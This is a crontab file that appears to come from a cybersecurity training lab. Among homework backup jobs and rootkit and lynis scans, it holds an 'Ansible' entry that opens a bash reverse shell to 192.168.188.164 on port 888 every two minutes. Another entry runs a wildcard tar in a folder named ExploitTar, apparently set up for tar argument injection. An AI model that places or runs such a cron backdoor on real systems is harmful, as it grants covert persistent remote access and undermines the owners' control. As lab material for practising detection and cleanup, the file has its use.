# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.sjtQr7/crontab installed on Thu Oct 22 19:14:19 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
#Ansible: Connect to IP
*/2 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.188.164/888 0>&1'
#Ansible: back up jane's documents
*/2 * * * * cd /home/jane/Documents/ExploitTar && tar cf ../jane_docs_backup.tar *
#Ansible: Existentially useless cron
*/2 * * * * touch /tmp/pointlessfile
#Ansible: check for rootkits
@daily bash /opt/chkrootkit
#full lynis scan
30 23 * * 3 /home/sysadmin/Security_scripts/lynis.system.sh
#partial lynis scan
@daily /home/sysadmin/Security_scripts/lynis.partial.sh

#--------------------HOMEWORK WEEK 5 BELOW ------------------

#HOMEWORK ASSIGNMENT 5 - BACKUP /var/auth.log
0 6 * * 3 tar czf /auth_backup.tgz -g /auth_backup.snar /var/log/auth.log
#HOMEWORK ASSIGNMENT 5 BONUS 3!! - ADDING Gramm-Leach-Bliley Act Backup Routines
@weekly /home/sysadmin/Projects/backups/system.sh
